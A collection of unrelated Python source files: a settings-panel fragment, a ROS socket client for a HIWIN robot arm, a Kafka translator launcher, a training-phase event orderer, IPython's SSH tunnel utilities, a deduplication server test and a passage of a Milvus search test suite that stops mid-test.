form_env = FormComponent(label=self.i18n['web.settings.nativefier.env'].capitalize(), components=[input_electron, select_nativefier])
return PanelComponent([form_env])
def save_settings(self, component: PanelComponent) -> Tuple[bool, List[str]]:
config = read_config()
form_env = component.components[0]
config['environment']['electron']['version'] = str(form_env.get_component('electron_version').get_value()).strip()
if len(config['environment']['electron']['version']) == 0:
config['environment']['electron']['version'] = None
system_nativefier = form_env.get_component('nativefier').get_selected()
if system_nativefier and not nativefier.is_available():
return False, [self.i18n['web.settings.env.nativefier.system.not_installed'].format('Nativefier')]
config['environment']['system'] = system_nativefier
try:
save_config(config, CONFIG_FILE)
return True, None
except:
return False, [traceback.format_exc()]
|
HiwinRA605_socket_ros_20190614133908.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speed_Mode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speed_Mode = Speed_Mode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Arm_SpeedMode(req): ##接收策略端傳送手臂模式資料
socket_cmd.Speed_Mode = int('%s'%req.Speed_Mode)
return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('arm_speed_mode',speed_mode, Arm_SpeedMode) ##server speed mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.SetMode(socket_cmd.grip,socket_cmd.Speed_Mode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
feedback = 0
socket_client_arm_state(feedback)
print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
feedback = 1
socket_client_arm_state(feedback)
print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Arm_feedback = TCP.Is_busy(feedback)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
app.py
|
#!/bin/python
import logging
import os
from multiprocessing import Process
from controller.translatorcontroller import translatorapp
from kafkawrapper.translatorconsumer import consume
from kafkawrapper.transnmtconsumer import consume_nmt
from anuvaad_auditor.loghandler import log_exception
log = logging.getLogger('file')
app_host = os.environ.get('ANU_ETL_TRANSLATOR_HOST', '0.0.0.0')
app_port = os.environ.get('ANU_ETL_TRANSLATOR_PORT', 5001)
# Starts the kafka consumer in a different thread
def start_consumer():
with translatorapp.test_request_context():
try:
trans_consumer_process = Process(target=consume)
trans_consumer_process.start()
trans_nmt_consumer_process = Process(target=consume_nmt)
trans_nmt_consumer_process.start()
except Exception as e:
log_exception("Exception while starting the Translator kafka consumers: " + str(e), None, e)
if __name__ == '__main__':
start_consumer()
translatorapp.run(host=app_host, port=app_port, threaded=True)
|
algo_phase.py
|
import logging
import queue
import threading
import typing
class AlgoPhase(object):
"""Simple training/testing/evaluation class"""
def __init__(self, model, listeners, phase=None, event_processor=None):
self._phase = phase
self._model = model
self._iteration = 0
self.listeners = listeners
self.listeners += self.onevent
self._lock = threading.RLock()
if event_processor is not None:
self.input_event_processor = event_processor
else:
self.input_event_processor = self.onevent
def process(self, data):
with self._lock:
self._iteration += 1
iteration = self._iteration
self.listeners({'type': 'before_iteration', 'model': self._model, 'phase': self._phase, 'iteration': iteration, 'model_input': data})
logging.getLogger(__name__).debug("Phase " + str(self._phase) + " iteration " + str(iteration))
model_output = self._model(data)
self.listeners({'type': 'after_iteration', 'model': self._model, 'phase': self._phase, 'iteration': iteration, 'model_input': data, 'model_output': model_output})
def onevent(self, event):
if event['type'] == 'data' and 'phase' in event and event['phase'] == self._phase:
self.process(event['data'])
class AlgoPhaseEventsOrder(object):
def __init__(self, phases: typing.List[typing.Tuple[str, int]], listeners, phase_suffix='_unordered'):
self.phases = phases
self.listeners = listeners
self.listeners += self.listener
self.phase_suffix = phase_suffix
self._lock = threading.RLock()
self.event_queues = {p[0]: queue.Queue() for p in phases}
self.phases_queue = queue.Queue()
self.phases_count = {p[0]: 0 for p in phases}
self.thread = None
def listener(self, event):
if isinstance(event, dict) and 'type' in event and event['type'] == 'after_iteration' and 'phase' in event:
if event['phase'].endswith(self.phase_suffix):
raise Exception("after_iteration events cannot be unordered")
self.start_generator()
with self._lock:
phase = event['phase']
self.phases_count[phase] += 1
ind = [p[0] for p in self.phases].index(phase)
if self.phases_count[phase] == self.phases[ind][1]:
self.phases_count[phase] = 0
self.phases_queue.put(self.phases[(ind + 1) % len(self.phases)][0])
elif isinstance(event, dict) and 'type' in event and event['type'] == 'data' and 'phase' in event and event['phase'].endswith(self.phase_suffix):
self.start_generator()
self.event_queues[event['phase'].replace(self.phase_suffix, '')].put(event)
def start_generator(self):
with self._lock:
if self.thread is None:
self.phases_queue.put(self.phases[0][0])
def events_generator():
while True:
phase = self.phases_queue.get()
if phase is None:
break
for i in range(self.phases[[p[0] for p in self.phases].index(phase)][1]):
event = self.event_queues[phase].get().copy()
event['phase'] = phase
self.listeners(event)
self.event_queues[phase].task_done()
self.phases_queue.task_done()
self.thread = threading.Thread(target=events_generator, daemon=True)
self.thread.start()
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os,sys, atexit
import signal
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from .forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
evaluation_server_test.py
|
from io import StringIO
from threading import Thread
from unittest import TestCase
import requests
from deduplication.classifier_evaluator import ClassifierEvaluator
from deduplication.evaluation_server import EvaluationServer
class EvaluationServerTest(TestCase):
def setUp(self):
self.server = EvaluationServer(ClassifierEvaluator(), host_port=("127.0.0.1", 0))
Thread(target=self.server.serve_forever).start()
def tearDown(self):
self.server.shutdown()
def test(self):
url = "http://127.0.0.1:" + str(self.server.server_port)
full_data_ids = {"1", "2", "3", "4", "5", "6", "7", "8", "9", "0"}
id_duplicates = {frozenset({"1", "2"}), frozenset({"3", "4"}), frozenset({"5", "6"})}
self.server.classifier_evaluator.prepare(full_data_ids, id_duplicates)
files = {'file': StringIO('"id1";"id2"\n1;2\n4;5\n')}
response = requests.post(url, files=files)
self.assertEqual(200, response.status_code)
self.assertTrue("precision" in response.text)
self.assertTrue("0.5" in response.text)
self.assertTrue("recall" in response.text)
self.assertTrue("0.33" in response.text)
|
test_search_20.py
|
import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_travel_timestamp(self, request):
if request.param == 9999999999:
pytest.skip("9999999999 is valid for travel timestamp")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_guarantee_timestamp(self, request):
if request.param == 9999999999:
pytest.skip("9999999999 is valid for guarantee_timestamp")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field value
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)[0:4]
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
message = "Search params check failed"
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit_value: searching with "
